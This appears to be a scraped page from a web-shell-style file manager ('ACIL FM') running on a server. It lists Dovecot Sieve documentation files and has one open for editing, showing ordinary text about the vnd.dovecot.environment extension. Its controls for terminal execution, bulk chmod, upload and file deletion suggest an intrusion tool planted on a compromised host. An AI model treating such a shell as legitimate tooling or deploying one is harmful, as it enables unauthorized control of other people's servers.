ACIL FM
Dark
Refresh
Current DIR:
/usr/share/doc/dovecot/sieve/extensions
/
usr
share
doc
dovecot
sieve
extensions
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
duplicate.txt
1.43 MB
chmod
View
DL
Edit
Rename
Delete
editheader.txt
2.14 MB
chmod
View
DL
Edit
Rename
Delete
include.txt
1.08 MB
chmod
View
DL
Edit
Rename
Delete
spamtest-virustest.txt
4.88 MB
chmod
View
DL
Edit
Rename
Delete
vacation.txt
5.3 MB
chmod
View
DL
Edit
Rename
Delete
vnd.dovecot.environment.txt
1.46 MB
chmod
View
DL
Edit
Rename
Delete
vnd.dovecot.report.txt
2.01 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /usr/share/doc/dovecot/sieve/extensions/vnd.dovecot.environment.txt
Vnd.dovecot.environment Extension Relevant specifications ======================= doc/rfc/spec-bosch-sieve-dovecot-environment.txt Description =========== The "vnd.dovecot.environment" extension builds upon the existing standard "environment" extension, which allows Sieve scripts to access information about their execution context, such as the name and version of the Sieve interpreter implementation. The new "vnd.dovecot.environment" extension adds a few more environment items that can be accessed by Sieve scripts. Additionally, it makes the environment items available directly as variables [VARIABLES]. Configuration ============= The "vnd.dovecot.environment" extension is not available by default; it needs to be added to the sieve_extensions or (rather) the sieve_global extensions setting. Currently, the "vnd.dovecot.environment" extension has no specific settings. However, this extension adds environment items with a "vnd.dovecot.config." prefix that can be used to access part of the Dovecot configuration. An environment item named "vnd.dovecot.config.identifier" yields the value of a plugin setting called "sieve_env_identifier". Example ======= With the following configuration: plugin { sieve = ~/.dovecot.sieve sieve_env_reject_reason = Please don't mail me. } The following script will reject the message with the configured reason: require "reject"; require "variables"; require "vnd.dovecot.environment"; reject "${vnd.dovecot.config.reject_reason}";
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply